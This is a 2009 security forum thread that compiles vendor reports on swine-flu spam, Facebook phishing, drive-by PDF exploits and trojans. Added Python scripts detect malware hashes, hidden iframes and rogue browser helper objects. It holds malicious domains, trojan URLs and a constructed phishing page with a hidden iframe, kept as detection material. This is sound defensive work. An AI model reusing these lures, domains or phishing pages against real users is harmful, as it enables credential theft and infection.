- http://www.theregister.co.uk/2009/04/21/zango/
21 April 2009 "Updated... The adware maker was forced to pull down the shutters on its business after it was left unable to service its debts. Initially we, along with other news outlets, incorrectly reported that video search engine firm Blinkx had acquired Zango. In fact Blinkx has only bought a proportion of its assets from administrators. "The bank foreclosed on Zango and Blinkx purchased some technical assets from the bank, including some IP and hardware, which constituted about 10 per cent of Zango's total assets," a Blinkx spokeswoman explained..."
- http://sunbeltblog.blogspot.com/2009/04/ding-dong-zango-is-dead.html
April 21, 2009
:bigthumb:
AplusWebMaster
2009-04-27, 22:14
FYI...
Spam referencing Swine flu outbreak
- http://www.sophos.com/blogs/sophoslabs/v/post/4245
April 27, 2009 - "Predictably enough, today we started to see spam taking advantage of concerns around the current Swine Flu outbreak... In the campaign seen earlier today, the purpose of the spam is meds related. Anyone clicking on the link in the message is -redirected- to an all too familiar Canadian Pharmacy site..."
(Screenshots available at the URL above.)
- http://www.us-cert.gov/current/#swine_flu_phishing_attacks_and
April 27, 2009
- http://blog.trendmicro.com/swine-flu-outbreak-hits-the-web-through-spam/
Apr. 28, 2009 - (More screenshots...)
Spamvertised Swine Flu Domains
- http://ddanchev.blogspot.com/2009/04/spamvertised-swine-flu-domains.html
April 28, 2009 - "... Swine flu spamvertised domains (long list)... Happy blacklisting/cross-checking!"
:fear:
AplusWebMaster
2009-04-30, 14:15
FYI...
Facebook phishing attack
- http://preview.tinyurl.com/crz7yq
April 29, 2009 Techcrunch.com - "... new phishing attack that has broken out on Facebook. If you get an email message that looks to be from Facebook with the subject, “Hello,” and featuring the text below, don’t bother clicking on the link included. Doing so takes you to a site called fbaction .net that mimics the look of the main Facebook login page, hoping to get you to sign in. Naturally, if you do that, the site will have access to your account and can send out more of these messages to your friends. The message body will apparently read something like this (with YOURFRIEND being replaced by the name of a friend of yours):
YOURFRIEND sent you a message.
Subject: Hello
“Visit http: //www.facebook .com/l/4253f;http ://fbaction .net/”...
... looks like “fbaction .net” is now the #2 hot trending search topic for all of Google Trends. This thing is apparently spreading quick... Facebook is now blocking outgoing links to that domain, and some browsers, like IE8, have flagged it as malicious."
(Screenshot available at the Techcrunch URL above.)
:fear::fear:
AplusWebMaster
2009-05-01, 00:56
FYI...
- http://sunbeltblog.blogspot.com/2009/04/trouble-with-search-engines-and.html
April 30, 2009 - "... Spammers saw this coming on Monday. Spam with headlines claiming that celebrities (Salma Hayek, Madonna) have caught the disease are peddling generic Tamiflu – or stealing the credit card numbers of those naïve enough to make a purchase from one of the nearly 300 newly-registered domains with a “Swine Flu” twist in their name. Cisco’s IronPort anti-spam service says Swine Flu spam is now four percent of global spam. Spam that preys on public fears generated by big news stories is now a genre... See Information week’s coverage here*."
* http://www.informationweek.com/shared/printableArticle.jhtm?articleID=217200528
:fear::mad::fear:
AplusWebMaster
2009-05-02, 23:26
FYI...
More Swine/Mexican/H1N1 related domains
- http://isc.sans.org/diary.html?storyid=6325
Last Updated: 2009-05-02 14:21:58 UTC - "... be ever vigilant in your browsing for Swine/Mexican/H1N1 flu information. We show over 1000 new domains containing those keywords registered in the last 24 hours."
Fed Reserve Spam/Malware Attack is After Your Data
- http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20090429
29 April 2009 - "... spam campaigns that are designed to appear as if they are coming from the Federal Reserve. These attacks are not attempting to phish you and trick you into giving them banking or other personal information... They are actually looking to install an info-stealing/banking trojan on your system via drive-by exploits... it is designed to look like a message coming from the Federal Reserve with a message designed to get you to click the link from the e-mail... The bad guys behind the Federal Reserve malware use the LuckySploit exploit pack. LuckySploit has a variety of exploits... Successful exploitation tends to drop a file named wQJs.exe onto the system in the user's Temp folder. It may also drop a file named svchost.exe (same name as a legitimate Windows file) onto the system as well. This "svchost.exe" and "wQJs.exe" are the same file. They both create shell32.dll and 123.info in the user's Temp directory as well. Note that 123.info is just a text file that contains the path to the malware.
Malware Details:
File Name: wJQs.exe | svchost.exe
File Size: 9216 bytes
MD5 hash: 175ef7faf41ecbe757bcd3021311f315
File Name: shell32.dll
File Size: 6144 bytes
MD5 hash: 3182da0a9c6946e226ee6589447af170
VirusTotal Results for these files can be viewed below:
.exe: http://www.virustotal.com/analisis/a4f6ce98cb24ca1640d7f86ceb6181f1
.dll: http://www.virustotal.com/analisis/d6ba4efea309d3993c6215bf41a64f7c ..."
(Screenshot and more detail available at the Shadowserver URL above.)
:fear::mad::fear:
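The Shadowserver write-up gives three things a responder can check for on a suspect box: the two MD5s, a "svchost.exe" sitting in the user's Temp folder rather than System32, and the 123.info text file that points at the dropped payload. Added example (not from the Shadowserver post or this thread), in Python: a sweep of a Temp directory that applies all three checks and also flags one payload stored under two names. The directory it runs on is built from placeholder bytes (no real samples are embedded), so the published hashes only match real files; the demo adds the placeholder's own hash to show the hash path firing. The victim path in the marker file is invented.

```python
import hashlib
import os
import shutil
import tempfile

# MD5s published in the Shadowserver post above.
KNOWN_BAD_MD5 = {
    "175ef7faf41ecbe757bcd3021311f315": "wQJs.exe / svchost.exe dropper",
    "3182da0a9c6946e226ee6589447af170": "dropped shell32.dll",
}
# File names that belong in a Windows system directory, never in %TEMP%.
SYSTEM_NAMES = {"svchost.exe", "shell32.dll"}
DROPPER_MARKER = "123.info"      # text file holding the path to the malware

# Constructed stand-ins for the dropped files; real samples are not embedded.
SAMPLE_DROPPER_BYTES = b"MZ-placeholder-dropper"
SAMPLE_DLL_BYTES = b"MZ-placeholder-dll"
SAMPLE_MARKER_TEXT = "C:\\Users\\victim\\AppData\\Local\\Temp\\wQJs.exe"


def md5_of(path):
    digest = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def sweep_temp(temp_dir, bad_hashes=KNOWN_BAD_MD5):
    """Return (file, finding, detail) triples for the files in temp_dir."""
    findings = []
    first_seen = {}             # digest -> name, to catch one payload under two names
    for name in sorted(os.listdir(temp_dir)):
        path = os.path.join(temp_dir, name)
        if not os.path.isfile(path):
            continue
        digest = md5_of(path)
        if digest in bad_hashes:
            findings.append((name, "hash_match", bad_hashes[digest]))
        if digest in first_seen:
            findings.append((name, "duplicate_of", first_seen[digest]))
        else:
            first_seen[digest] = name
        if name.lower() in SYSTEM_NAMES:
            findings.append((name, "system_name_in_temp", path))
        if name.lower() == DROPPER_MARKER:
            with open(path, encoding="utf-8", errors="replace") as f:
                findings.append((name, "dropper_marker", f.read().strip()))
    return findings


def build_sample_temp():
    """Create a throw-away directory laid out like the infected Temp folder."""
    temp_dir = tempfile.mkdtemp(prefix="fedreserve-")
    files = {
        "svchost.exe": SAMPLE_DROPPER_BYTES,
        "wQJs.exe": SAMPLE_DROPPER_BYTES,        # same bytes under a second name
        "shell32.dll": SAMPLE_DLL_BYTES,
        "123.info": SAMPLE_MARKER_TEXT.encode(),
        "harmless.txt": b"meeting notes",
    }
    for name, data in files.items():
        with open(os.path.join(temp_dir, name), "wb") as f:
            f.write(data)
    return temp_dir


def demo():
    """Sweep the constructed folder twice: once with the published hashes plus
    the placeholder dropper's hash, once with the published hashes alone."""
    temp_dir = build_sample_temp()
    try:
        hashes = dict(KNOWN_BAD_MD5)
        hashes[hashlib.md5(SAMPLE_DROPPER_BYTES).hexdigest()] = "constructed dropper"
        return sweep_temp(temp_dir, hashes), sweep_temp(temp_dir)
    finally:
        shutil.rmtree(temp_dir)


if __name__ == "__main__":
    with_placeholder, published_only = demo()
    for finding in with_placeholder:
        print(finding)
    print("published hashes alone matched:",
          any(kind == "hash_match" for _, kind, _ in published_only))
```

On a real machine, point sweep_temp() at %TEMP% and %WINDIR%\Temp; the name-based and marker checks catch repacked variants whose hashes have changed, which is why they are kept separate from the hash list.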
AplusWebMaster
2009-05-04, 13:46
FYI...
IFrame redirects lead to MBR rootkit
- http://blog.trendmicro.com/porn-sites-lead-to-mbr-rootkit/
May 3, 2009 - "Websites related to pornography that appear to be compromised were found by Trend Micro engineers loading malicious JavaScript which redirects users onto malicious domains that ultimately lead to the download of an MBR rootkit (TROJ_SNOWAL.A) onto the affected system... malicious scripts all follow a similar routine: upon execution, it checks for the date on the target system then generates a URL based on the date obtained. It then creates an IFrame, which would redirect the user to the generated URL. The URL then leads to the download of a malicious file, which in turn downloads an MBR rootkit..."
(Screenshot and more detail available at the URL above.)
:fear::spider::fear:
AplusWebMaster
2009-05-04, 19:21
FYI...
Facebook phishing malware
- http://isc.sans.org/diary.html?storyid=6328
Last Updated: 2009-05-04 14:47:00 UTC - "Looks like there may be a piece of malware out there that is sending out messages to folks on Facebook trying to trick them into visiting a facsimile "Facebook" login page to steal credentials. The phishing site is currently on "junglemix .in," so you may want to block that site. More details as we figure this thing out..."
:fear::mad::fear:
AplusWebMaster
2009-05-05, 04:34
FYI...
H1N1 Domains
- http://www.f-secure.com/weblog/archives/00001674.html
May 4, 2009 - "... here is a list of domains* registered over the weekend using the words swine flu. There are 1,344 on the list. Again, so far, none of the domains we've checked are hosting any malicious files. In fact, the only malicious file we've seen is something that Symantec posted** about last week. It's a PDF "Swine Flu FAQ" exploit which drops a password stealer and then opens a clean PDF file as a decoy. One interesting thing about the exploit that hasn't been mentioned yet is the file name, The Association of Tibetan journalists Press Release.pdf. Tibet themed exploits are very popular with targeted attacks***."
* http://www.f-secure.com/weblog/archives/swineflu_domains_may_4th_2009.txt
** https://forums2.symantec.com/t5/blogs/blogarticlepage/blog-id/malicious_code/article-id/268
*** http://www.f-secure.com/weblog/archives/00001672.html
:fear:
AplusWebMaster
2009-05-06, 13:11
FYI...
Waledac Turns to Cash and Vaccines w/SPAM
- http://blog.trendmicro.com/waledac-turns-to-cash-and-vaccines/
May 5, 2009 - "Riding on the ongoing global economic recession, Waledac updates its SPAM messages with email subjects related to earning a fortune through Google cash. Other spam email subjects we’ve seen so far:
* Be your own boss with Google
* Earn cash using Google today
* Google System that really works
* Make a fortune online
* Make thousands a month from home
* Start your home business today
* Use Google to earn extra cash
As of this writing, the hyperlink found in the email body redirects to an advertising link which currently returns a redirect loop error in Firefox web browser. Another current event seen leveraged on by this wave of Waledac spam runs is the swine flu outbreak, as spammed messages bear subjects that seem related to a vaccine for swine flu. Other spam email subjects seen so far:
* Anti-swine flu drugs are available here
* Anti-viral treatment for swine flu
* Are you worried about swine flu?
* Are you worried about swine flu? buy medicine!
* Be quick! anti-swine flu drugs are almost sold out
* Buy medicine that prevent you from getting swine flu
* Buy medicine to prevent swine flu
* Buy new effective medicine against swine flu
* Buy the most effective treatment for combating the new swine flu
* Do you want to prevent yourself from swine flu?
* Do you want to protect yorself against swine flu?
* Dont stand in line for swine flu medicine
* Get swine flu medicine here
* Get the swine flu medicine right here
* Hurry up! swine flu drugs are almost sold out
* Keep your family from getting swine flu
* New medicine to prevent swine flu
* New vaccine helps to prevent swine flu
* New vaccine to prevent swine flu
* Order anti-swine flu medicine today
* Order new medicine against swine flu
* Order now vaccine against swine flu
* Prevent infections with swine flu viruses
* Prevent yourself from cathcing swine flu
* Protect your family against swine flu!
* Protect yourself from swine flu
* Stop risk of being killed by swine flu!
* The vaccine protecting against swine flu
* You can buy swine flu drugs here
* You can order anti-flu drugs treaing swine flu here
* You can order anti-swine flu drugs on-line
* You can protect yourself against swine flu!
The given link however only leads to the all too familiar Canadian pharmacy site..."
(Screenshots available at the TrendMicro URL above.)
:fear::fear:
AplusWebMaster
2009-05-20, 19:19
FYI...
eBay phishing Scam...
- http://www.sophos.com/blogs/sophoslabs/v/post/4452
May 20, 2009 - "... eBay phishing scam came in the form of a seemingly innocent query about the sale of iPhones. The scam message is quite simple... At first sight, it appears to be a product spam campaign to promote the iPhone. However, when clicking the link that came with the attached email, a -fake- eBay page comes up. This email is actually a ruse designed to steal an eBay user’s information...
SophosLabs analysts have encountered many instances of such misdirection of legitimate websites. They range from internet banking websites to online retail websites. As always, online users should take precautions and never attempt to follow an embedded weblink to an online store or a banking website from an email, even if by first appearances, it looks legitimate..."
(Screenshots available at the URL above.)
:fear::mad:
AplusWebMaster
2009-05-22, 17:30
FYI...
Malicious iFrame on Gadgetadvisor.com
- http://www.f-secure.com/weblog/archives/00001687.html
May 22, 2009 - "Are you a gadget geek? Do you often seek advice from Gadget Advisor before making a purchase? Our Web Security Analyst discovered a malicious IFrame on the popular tech website that redirects visitors to a malicious website... If the site detects a PDF browser plugin for Adobe Acrobat and Reader, it loads a specially-crafted malicious PDF file that exploits a stack-based buffer overflow vulnerability ( http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2992 ). The net effect of the attack is to plant a trojan, detected as Trojan-Downloader.Win32.Agent.brxr, on vulnerable systems by calling the util.printf JavaScript function, which connects back to the malicious website in order to download the trojan to the machine. A remote attacker can access the user's machine once it has been infected with the trojan... This attack is targeted against older, unpatched versions of Adobe programs, as the latest Adobe updates have already fixed this problem. More information and the updates can be found at Adobe at:
http://www.adobe.com/support/security/bulletins/apsb08-19.html. Disabling the JavaScript function in Acrobat and Reader will also prevent the threat from proceeding."
(Screenshot available at the F-secure URL above.)
:fear::mad:
AplusWebMaster
2009-05-25, 13:43
FYI...
Facebook phishing/spam/"worm" ...
- http://isc.sans.org/diary.html?storyid=6451
Last Updated: 2009-05-25 07:16:47 UTC ... (Version: 5) - "... new Facebook phishing/spam/"worm" campaign is doing the rounds. It uses Belgium domains (.be) to impersonate the Facebook login page and steal the user credentials.
UPDATE 4: The malicious domains do not only impersonate Facebook but contain malicious "hidden" (1x1pixel) iframes, hosted on the same host, such as: "/tds/r.php?sid=2&pid=5511". Do not browse them...
UPDATE 3: As expected, more domains are coming (and some of them are still active right now - May 25, 0:00am CET)...:
• redfriend dot be, redbuddy dot be, picoband dot be, areps dot at, greenbuddy dot be
• picoband dot be, vispace dot be, whiteflash dot be, bestspace dot be
• There are other "more than suspicious" .be domains associated to the same IP address.
The ones active do resolve to IP address 211.95.78.98. From APNIC...
country: CN ..."
- http://www.f-secure.com/weblog/archives/00001689.html
May 25, 2009
:fear::mad::fear:
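UPDATE 4 above is the useful detail for anyone looking at a copy of one of these pages: besides the fake login form there is a 1x1 pixel iframe to a "/tds/r.php?..." traffic-distribution URL. Added example (not from the ISC diary or this thread), in Python with the standard library HTML parser: it pulls out every iframe a user could not see, whether it is sized 1x1 through attributes, hidden with CSS, or zero-sized through inline style. The page it runs on is constructed to look like the hosts described above; the tracker.invalid and video.invalid URLs are invented, the /tds/r.php path is the one quoted in the diary.

```python
import re
from html.parser import HTMLParser

# width:0 / height:1 style declarations, with or without "px", after
# whitespace has been stripped from the style attribute.
_STYLE_ZERO = re.compile(r"(?:^|;)(?:width|height):[01](?:px)?(?:;|$)")

# Constructed page in the style of the phishing hosts described above:
# a fake login form plus iframes of several kinds (URLs are invented).
SAMPLE_PAGE = """<html><body>
<form action="/login.php" method="post">Email <input name="email"> Password <input name="pass" type="password"></form>
<iframe src="/tds/r.php?sid=2&amp;pid=5511" width="1" height="1" frameborder="0"></iframe>
<iframe src="http://tracker.invalid/c.php" style="display: none"></iframe>
<iframe src="http://tracker.invalid/d.php" style="width:0px; height:0px; border:0"></iframe>
<iframe src="http://video.invalid/embed" width="640" height="480"></iframe>
</body></html>"""


def _is_tiny(value):
    """True for width/height attribute values of 0 or 1, with or without px."""
    if value is None:
        return False
    v = value.strip().lower()
    if v.endswith("px"):
        v = v[:-2]
    return v.strip() in ("0", "1")


class HiddenIframeFinder(HTMLParser):
    """Collect (src, reasons) for every iframe a user could not see."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)                     # attribute values are already unescaped
        style = (a.get("style") or "").replace(" ", "").lower()
        reasons = []
        if _is_tiny(a.get("width")) and _is_tiny(a.get("height")):
            reasons.append("1x1")
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("css-hidden")
        if _STYLE_ZERO.search(style):
            reasons.append("css-zero-size")
        if reasons:
            self.hits.append((a.get("src") or "", reasons))


def find_hidden_iframes(html):
    """Parse a page and return the hidden iframes in document order."""
    parser = HiddenIframeFinder()
    parser.feed(html)
    parser.close()
    return parser.hits


if __name__ == "__main__":
    for src, reasons in find_hidden_iframes(SAMPLE_PAGE):
        print(src, reasons)
```

The 640x480 frame is reported as nothing, which is the point: an iframe is not an indicator by itself, an invisible one on a login page is. Pair the src values this returns with the hostname/IP lists in the diary when deciding what to block.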
AplusWebMaster
2009-05-26, 14:41
FYI...
Facebook phishing using Belgium (.be) domains (cont'd)
- http://isc.sans.org/diary.html?storyid=6451
Last Updated: 2009-05-25 20:01:20 UTC ...(Version: 6)
"UPDATE 5: (May 25, 22:00h CET) It seems there is a new variation moving around, using tinyurl links... For example, you get a Facebook message pointing to "tinyurl dot com /o5kblj/" that takes you to a link at "simplemart dot be".
> Remember you can enable/disable the tinyurl preview feature through
" http://tinyurl.com/preview.php ". You just need to enable cookies on your browser.
Some of the malicious domains being used are redfriend dot be, redbuddy dot be, picoband dot be... (at this point, none of them can be resolved)..."
:fear::fear:
AplusWebMaster
2009-05-27, 17:07
More on same...
Koobface... again
- http://securitylabs.websense.com/content/Alerts/3403.aspx
05.26.2009 - "... Koobface attempted another running campaign on Facebook. If infected, Facebook users start to spam their friends with a link to a malicious Web site. When users visit the link, they are redirected to various malicious and phishing pages. We detected these on numerous .be domains and TinyURL links. One such malicious page is a fake YouTube page that appears to be a funny video. The page tells visitors to upgrade their Flash player in order to play the video, and the Flash setup program is actually Koobface malware... Among other things, a proxy server is installed on the infected computer..."
(Screenshots available at the Websense URL above.)
:fear: :mad:
AplusWebMaster
2009-06-02, 00:22
FYI...
Another "Digital Certificate" malware campaign
- http://isc.sans.org/diary.html?storyid=6499
Last Updated: 2009-06-01 16:21:12 UTC - "... a "Bank of America Digital Certificate Updating" scheme is used, where a victim of the luring email is directed to a fake website... Using the <Update Certificate> button here will net you a piece of Malware that has approximately 30% AV coverage (as indicated by VirusTotal). A quick analysis of said malware shows probable signs of, surprise-surprise, Waledac..."
(Screenshot available at the URL above.)
:fear::mad:
AplusWebMaster
2009-06-02, 08:24
FYI...
- http://www.theregister.co.uk/2009/06/02/twitter_malware_scam/
2 June 2009 - "Twitter users over the weekend were the target of a scam that tried to infect them with rogue anti-virus software and other malware, in what is one of the first times the micro-blogging site has been hit by a known for-profit attack, a security researcher said. The problem started after a flurry of tweets directed users to a website promising "Best Video." The site appeared to offer content from YouTube, but behind the scenes, the site delivered a PDF document designed to infect those using vulnerable versions of Adobe's Reader program. Victims then received an urgent warning that their systems were infected and needed to be cleaned using fraudulent security software... The scam promoted a piece of rogue anti-virus software dubbed System Security."
- http://www.viruslist.com/en/weblog?weblogid=208187734
June 01, 2009 - "... fake program called "System Security" is being promoted... Most likely the cyber criminals behind this attack simply used the stolen credentials of those phished accounts to tweet the messages... If the trends we've seen on other social platforms are any indicator for Twitter then we can only expect an increase in attacks."
(Screenshots available at the URL above.)
- http://pandalabs.pandasecurity.com/archive/Visualizing-the-Twitter-Trends-Attack.aspx
11 June 09 - "... cyber criminals have been targeting Twitter users by creating thousands of messages (tweets) embedded with words involving trending topics and malicious URLs. If the URLs were accessed, the victims would arrive at a rogueware website designed to trick them into thinking that their computer is infected, therefore justifying the need to purchase the fake software offered. Since the initial discovery, we have been keeping a close eye on this attack, but the malicious tweets continue... The ease of carrying out this type of attack leads us to believe that this will not go away anytime soon... "
:fear::mad:
AplusWebMaster
2009-06-09, 09:08
FYI...
- http://www.marshal8e6.com/trace/i/FTC-Shuts-Down-Rogue-ISP,trace.1003~.asp
June 8, 2009 - "Last week the US Federal Trade Commission shut down a rogue ISP because it hosted a range of botnet command and control servers, malware, and child pornography. The ISP, known as 3FN (also as APS Telecom) was thought to be responsible for a number of spam botnet control servers, notably Pushdo/Cutwail... did this shutdown have any impact on spam? Looking at our Spam Statistics from last week, we do see a dip down of about 15% in our Spam Volume Index (SVI)... And spam originating from the Pushdo botnet indeed seems to be affected. The proportion of spam from Pushdo has dipped, along with Mega-D. Rustock seems completely unaffected... spam from Pushdo is still coming in to our spam traps, but at a much reduced rate... In terms of its impact on spam, the event is not quite in the same league as the McColo shutdown last November when spam output was halved overnight, but it is still very welcome nonetheless..."
(Charts available at the URL above.)
:spider:
AplusWebMaster
2009-06-09, 15:51
FYI...
More Blackhat SEO "scareware" campaigns
- http://ddanchev.blogspot.com/2009/06/fake-web-hosting-provider-front-end-to.html
June 08, 2009 - "... they've got no customers but the cybercriminals themselves maintaining a portfolio of over 7,000 adult related keywords which they have been using for blackhat SEO campaigns across thousands of automatically registered - CAPTCHA recognition outsourced - Blogspot accounts since February, 2009... Not only is life4info .info or dirsite .com a bogus free hosting provider, but the campaigns hosted by them are interacting with our "dear friends" at AS30407; VELCOM .com which Spamhaus describes as "N. American base of Ukrainian cybercrime spammers" - and with a reason."
(Screenshots and more detail available at the URL above.)
:fear::mad::fear:
AplusWebMaster
2009-06-11, 20:10
FYI...
Malicious SPAM - Air France plane crash
- http://securitylabs.websense.com/content/Alerts/3417.aspx
06.11.2009 - "Websense... has detected a new malicious spam campaign pretending to deliver legitimate news updates about the Air France plane crash ( http://news.bbc.co.uk/1/hi/world/americas/8078147.stm ). The spam campaign is in Portuguese, and includes a link to view the first videos from the crash site. The link to the video leads to a Trojan Downloader file named: Video_AirFrance_447.com. If a user runs the file, it downloads a malicious executable file masquerading as an image from [removed].org/imgs/like2.jpg. The malware registers a password-stealing BHO component on the system masquerading as a McAfee SiteAdvisor component with this GUID: {9387b8b2-5508-11de-8729-c56f55d89593}. The GUID is linked to the malicious installed DLL file named mcieplg.dll under the system32 directory (%windir%\system32\mcieplg.dll). AV detection rates on this file are very low*..."
* http://www.virustotal.com/analisis/c57a0a4f2a45eefe9cd8e41a0f64c3da9fabb33dd6043ddf82a2550654916914-1244673584
(Screenshots available at the Websense URL above.)
:fear::mad:
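The Websense alert above gives two concrete indicators: the BHO CLSID and the DLL name under system32. The following is an added example, not code from the original post or from Websense, that parses a registry export of the Browser Helper Objects key, resolves each CLSID to its InprocServer32 DLL, and flags entries that match those indicators. The .reg text is constructed for the example; the "vendor name but DLL in system32" rule is a heuristic assumption, not a published indicator.

```python
import re
from collections import defaultdict

BHO_ROOT = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects"
CLSID_ROOT = r"HKEY_CLASSES_ROOT\CLSID"

# Indicators quoted in the Websense alert above.
IOC_CLSIDS = {"{9387b8b2-5508-11de-8729-c56f55d89593}"}
IOC_DLL_NAMES = {"mcieplg.dll"}

# Heuristic (assumption): a BHO carrying a security-vendor name normally lives
# under that vendor's Program Files tree, not loose in system32.
VENDOR_NAME_RE = re.compile(r"mcafee|siteadvisor|symantec|norton|kaspersky|sophos", re.I)

# Constructed .reg export (not a real capture): one clean BHO plus the IOC entry.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-2222-3333-4444-555555555555}]
@="Example Vendor Helper"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{9387B8B2-5508-11DE-8729-C56F55D89593}]

[HKEY_CLASSES_ROOT\CLSID\{11111111-2222-3333-4444-555555555555}]
@="Example Vendor Helper"

[HKEY_CLASSES_ROOT\CLSID\{11111111-2222-3333-4444-555555555555}\InprocServer32]
@="C:\\Program Files\\Example Vendor\\helper.dll"
"ThreadingModel"="Apartment"

[HKEY_CLASSES_ROOT\CLSID\{9387B8B2-5508-11DE-8729-C56F55D89593}]
@="McAfee SiteAdvisor"

[HKEY_CLASSES_ROOT\CLSID\{9387B8B2-5508-11DE-8729-C56F55D89593}\InprocServer32]
@="C:\\WINDOWS\\system32\\mcieplg.dll"
"ThreadingModel"="Apartment"
"""


def parse_reg_export(text):
    """Parse a .reg export into {lower-cased key path: {value name: data}}.
    Only string values (@="..." and "name"="...") are unescaped; that is all
    BHO registration uses."""
    keys = defaultdict(dict)
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            keys[current]  # register the key even if it has no values
        elif current is not None and "=" in line:
            name, _, data = line.partition("=")
            name = "(default)" if name == "@" else name.strip('"')
            if data.startswith('"') and data.endswith('"'):
                data = data[1:-1].replace('\\"', '"').replace("\\\\", "\\")
            keys[current][name] = data
    return dict(keys)


def audit_bhos(reg_text):
    """List every registered BHO with its DLL and the reasons it looks suspicious."""
    keys = parse_reg_export(reg_text)
    prefix = BHO_ROOT.lower() + "\\"
    findings = []
    for path in keys:
        if not path.startswith(prefix):
            continue
        clsid = path[len(prefix):]
        clsid_key = keys.get(f"{CLSID_ROOT}\\{clsid}".lower(), {})
        server = keys.get(f"{CLSID_ROOT}\\{clsid}\\InprocServer32".lower(), {})
        # The BHO key itself may carry no name; fall back to the CLSID's default value.
        name = keys[path].get("(default)") or clsid_key.get("(default)", "")
        dll = server.get("(default)", "")
        reasons = []
        if clsid in IOC_CLSIDS:
            reasons.append("CLSID matches published IOC")
        if dll.rsplit("\\", 1)[-1].lower() in IOC_DLL_NAMES:
            reasons.append("DLL name matches published IOC")
        if VENDOR_NAME_RE.search(name) and "\\system32\\" in dll.lower():
            reasons.append("vendor-branded BHO loaded from system32 (heuristic)")
        findings.append({"clsid": clsid, "name": name, "dll": dll, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_bhos(SAMPLE_REG):
        print(f["clsid"], f["name"], f["dll"], "; ".join(f["reasons"]) or "clean")
```

On a live system the same export is produced with `reg export "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects" bho.reg` and `reg export HKCR\CLSID clsid.reg` concatenated; the parser does not care about key order.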
AplusWebMaster
2009-06-13, 21:25
FYI...
- https://forums2.symantec.com/t5/blogs/blogarticlepage/blog-id/malicious_code/article-id/276
06-12-2009 - "... SPAM (message) noted that Symantec was working with Microsoft to create a patch for "Conflicker." According to the spam message, Conficker is also called "Troj/Brisv.A"... The spam is accompanied by a file named "remtool_conf.exe." The spammers have taken an extra step ahead of just spreading their Trojans. This file is actually a Symantec fixtool for Trojan.Brisv bundled with the Trojan. So, when someone runs this file they actually run the Symantec Brisv fixtool, along with the Trojan completing its task. In this case, the dropped Trojan contacts a remote site in order to download another piece of malware, which is currently detected by Symantec products as Suspicious.MH690.A... We gave the infection a run on a test machine. Almost immediately we saw our own EULA... Running the email attachment did a few things–it dropped the original (signed) Symantec Trojan.Brisv fixtool into a temporary folder; it dropped a Trojan into the same folder; and, it ran the original fixtool. One can see that this is indeed Symantec’s own legitimate fixtool. But, the Trojan file "webexplorer.exe" is basically a downloader. It contacts a remote site in order to download another file called "winupdate.exe". As you’ve guessed, that is also a Trojan and is currently detected as Suspicious.MH690.A... If you have a need to run a Symantec fixtool, go to the Symantec website* and download it for free..."
* http://www.symantec.com/business/security_response/removaltools.jsp
(Screenshots available at the first Symantec URL above.)
:fear::mad::fear:
AplusWebMaster
2009-06-15, 23:24
FYI...
- https://forums2.symantec.com/t5/blogs/blogarticlepage/blog-id/spam/article-id/200
06-15-2009 - "It may not be encouraging news for scammers, but users are slowly but surely adopting a see-and-delete approach for the usual fake stories related to lotteries, dormant bank accounts, an inheritance of huge wealth, and relatives of deceased or exiled political leaders sharing their millions. However, lately the trends seem to show that news stories involving current events are being piggybacked or manipulated by scammers to trap users into falling for fraudulent offers... Another recent scam we have been monitoring involves an event resembling the highly rated television reality show Big Brother, which began on June 4 in the UK. Scammers have been inviting recipients to participate in their Big Brother World to be held on July 12 in London, UK... Scammers claim to be a Big Brother agent and will furnish the competition details once users respond to the mailed invitation. Users will need to reply with the application type along with their full name, address, age, and telephone number. Even a casual look at the email reveals several spelling mistakes that start right from the subject line and continue on throughout the message, including using “price” instead of “prize” in the mail body. We would recommend that users follow the usual practice of ignoring [and deleting] such unsolicited emails..."
(Screenshot of scam e-mail available at the URL above.)
:fear::mad:
AplusWebMaster
2009-06-19, 17:10
FYI...
- http://blog.trendmicro.com/air-france-flight-447-spam-arrives-with-powerpoint-exploit/
June 17, 2009 - "After a blackhat SEO attack, cybercriminals are again using the terrifying catastrophe of Air France Flight 447 or about China-made C919 Jumbo Jets competing with Airbus and Boeing for malicious intent. This time, spam messages are sent with an attached PowerPoint presentation, which is specially crafted to exploit a vulnerability in Microsoft PowerPoint*. The spammed emails suggest that there are images in the attached PowerPoint presentation related to both the China-made jumbo jets and the Air France Flight 447, in order to lure the user into opening the specially crafted file... Users are strongly advised to apply the patch* provided by Microsoft to avoid being victimized by this threat..."
* http://www.microsoft.com/technet/security/bulletin/ms09-017.mspx
:fear::mad:
AplusWebMaster
2009-06-25, 02:15
FYI...
Nonstop site re-infections
- http://securitylabs.websense.com/content/Blogs/3425.aspx
06.24.2009 - "We recently published an alert* about the Ethiopian Embassy site being compromised... This isn't the first time the site has been compromised. In March of 2009, we noticed an iframe injection pointing to hxxp://[REMOVED]vv.com/index.php. The domain was also serving virus-infected files in other locations, including hxxp://[REMOVED]vv.com/unic/1.exe, a Trojan [see VirusTotal report**]... Attackers are in control and re-compromising the site over and over, potentially infecting visitors with malicious code at any time. These attacks are somewhat of a trend. We've documented a number of compromised embassy sites in the past, illustrating how malware delivery occurs through Web sites..."
* http://securitylabs.websense.com/content/Alerts/3423.aspx
** http://www.virustotal.com/analisis/94c15c9e48895e62dc20a7920b93da630fdf4967237114032d91fe4ecddf05a9-1240536959
"File 5143155606c013934a4601648e310800aff688c2.EXE ..."
(Screenshots and more detail available at the Websense URL above.)
:fear::mad:
AplusWebMaster
2009-06-25, 14:39
FYI...
Zbot In Your Inbox
